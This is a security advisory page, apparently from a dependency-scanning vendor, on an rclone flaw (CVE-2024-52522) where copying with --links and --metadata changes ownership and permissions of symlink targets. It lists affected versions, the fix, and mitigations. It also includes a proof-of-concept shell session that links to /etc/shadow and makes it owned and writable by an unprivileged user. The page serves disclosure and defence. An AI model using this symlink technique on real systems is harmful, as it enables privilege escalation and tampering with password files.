How severe is GHSA-hrxh-9w67-g4cv?

GHSA-hrxh-9w67-g4cv has a CVSS score of 5.5/10, rated MEDIUM. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-hrxh-9w67-g4cv?

GHSA-hrxh-9w67-g4cv affects the following packages: github.com/rclone/rclone (Go). Ecosystems affected: Go.

How do I fix GHSA-hrxh-9w67-g4cv?

Update github.com/rclone/rclone to 1.68.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-hrxh-9w67-g4cv is resolved across your whole dependency graph.

How do I detect GHSA-hrxh-9w67-g4cv in my Go dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/rclone/rclone. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-hrxh-9w67-g4cv if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-hrxh-9w67-g4cv?

O3 pinpoints whether GHSA-hrxh-9w67-g4cv is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-hrxh-9w67-g4cv actively exploited in the wild?

No public exploit code has been indexed for GHSA-hrxh-9w67-g4cv yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-hrxh-9w67-g4cv?

GHSA-hrxh-9w67-g4cv has an EPSS (Exploit Prediction Scoring System) score of 0.2%, placing it in the 12th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-hrxh-9w67-g4cv?

GHSA-hrxh-9w67-g4cv is classified as CWE-59 (CWE-59), CWE-61 (CWE-61), CWE-281 (CWE-281). These weakness types describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation.

When was GHSA-hrxh-9w67-g4cv published, and has it been updated?

GHSA-hrxh-9w67-g4cv was published on November 19, 2024 and was last updated on February 4, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐹 Go

GHSA-hrxh-9w67-g4cv

MEDIUM

Rclone has Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata

Also known asBIT-rclone-2024-52522CVE-2024-52522GO-2024-3271

Published

Nov 19, 2024

Updated

Feb 4, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.2%probability of exploitation in next 30 days

Lower Risk12th percentile+0.19%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐹github.com/rclone/rclone

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

tl;dr:

unprivileged user creates a symlink to /etc/sudoers, /etc/shadow or similar and waits for a privileged user or process to copy/backup/mirror users data (using --links and --metadata). unprivileged user now owns /etc/sudoers.

Summary

Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files (e.g., /etc/shadow), compromising system integrity, confidentiality, and availability.

For instance, an unprivileged user could set a symlink to a sensitive file within their home directory, waiting for an administrator or automated process (e.g., a cron job running with elevated privileges) to copy their files with rclone using the --links and --metadata options. Upon copying, rclone will incorrectly apply chown and chmod to the symlink’s target file rather than just the symlink itself, resulting in ownership and permission changes on the sensitive file.

Who is affected

If you are not using --metadata and --links and copying files to the local backend you are not affected by this issue.

If you are using --metadata and -links and copying files to the local backend but not as a superuser, then this will manifest itself as a bug by setting incorrect permissions.

If you are using --metadata and -links and copying files to the local backend but as a superuser then this could affect you.

Details

When copying directories containing symlinks with rclone using the --links and --metadata options, rclone mistakenly applies chown and chmod operations to the target of the symlink instead of the symlink itself. As a result, ownership and permissions on sensitive system files (e.g., /etc/shadow) may be altered if they are the target of any symlink within the copied directory structure. This allows users to affect the permissions and ownership of files they should not have access to, resulting in privilege escalation and potential system compromise.

PoC

# Create a directory to simulate a user home directory
root@workstation:~# mkdir -p /tmp/home/user1
root@workstation:~# sudo chown user1:user1 /tmp/home/user1

# As user1, create a symlink to /etc/shadow within their home directory
root@workstation:~# sudo -u user1 ln -s /etc/shadow /tmp/home/user1/shadow_link

# List permissions on the original files
root@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow
----------. 1 root  root  1283 Nov  5 13:30 /etc/shadow
lrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -> /etc/shadow

# Copy the directory structure with rclone
root@workstation:~# rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG
2024/11/05 13:56:53 DEBUG : rclone: Version "v1.68.1" starting with parameters ["rclone" "copy" "/tmp/home" "/tmp/home_new" "--links" "--metadata" "--log-level=DEBUG"]
2024/11/05 13:56:53 DEBUG : Creating backend with remote "/tmp/home"
2024/11/05 13:56:53 NOTICE: Config file "/root/.config/rclone/rclone.conf" not found - using defaults
2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding "{b6816}" suffix to name
2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item "/tmp/home" to be canonical "local{b6816}:/tmp/home"
2024/11/05 13:56:53 DEBUG : Creating backend with remote "/tmp/home_new"
2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding "{b6816}" suffix to name
2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item "/tmp/home_new" to be canonical "local{b6816}:/tmp/home_new"
2024/11/05 13:56:53 DEBUG : Added delayed dir = "user1", newDst=<nil>
2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: Need to transfer - File not found at Destination
2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: md5 = 2fe8599cb25a0c790213d39b3be97c27 OK
2024/11/05 13:56:53 INFO  : user1/shadow_link.rclonelink: Copied (new)
2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for checks to finish
2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for transfers to finish
2024/11/05 13:56:53 INFO  : user1: Updated directory metadata
2024/11/05 13:56:53 INFO  :
Transferred:             11 B / 11 B, 100%, 0 B/s, ETA -
Transferred:            1 / 1, 100%
Elapsed time:         0.0s

2024/11/05 13:56:53 DEBUG : 6 go routines active

# List permissions again
root@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow /tmp/home_new/user1/shadow_link
-rwxrwxrwx. 1 user1 user1 1283 Nov  5 13:30 /etc/shadow                                                 # Wrong, very wrong. Should be root:root and 0000.
lrwxrwxrwx. 1 root  root    11 Nov  5 13:56 /tmp/home_new/user1/shadow_link -> /etc/shadow              # Wrong too, should be user1:user1
lrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -> /etc/shadow

# Fix /etc/shadow and clean up
root@workstation:~# chown root:root /etc/shadow
root@workstation:~# chmod 000 /etc/shadow
root@workstation:~# rm -rf /tmp/home /tmp/home_new

Impact

Type of Vulnerability: Improper permissions and ownership handling on symlink targets (Insecure Handling of Symlinks)

Impact: This vulnerability allows unprivileged users to modify permissions and ownership of sensitive system files by creating symlinks to those files in directories that are subsequently copied by an administrator with rclone --links --metadata. This can lead to unauthorized access, privilege escalation, and potential system compromise.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐹Go	`github.com/rclone/rclone`	≥ 1.59.0&&< 1.68.2	1.68.2

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/rclone/rclone. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/rclone/rclone to 1.68.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-hrxh-9w67-g4cv is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-hrxh-9w67-g4cv is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-hrxh-9w67-g4cv. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### **tl;dr:** unprivileged user creates a symlink to /etc/sudoers, /etc/shadow or similar and waits for a privileged user or process to copy/backup/mirror users data (using `--links` and `--metadata`). unprivileged user now owns /etc/sudoers. ### Summary Insecure handling of symlinks with `--links` and `--metadata` in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical

O3 Security · Impact-Aware SCA

Is GHSA-hrxh-9w67-g4cv in your dependencies?

O3 detects GHSA-hrxh-9w67-g4cv across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works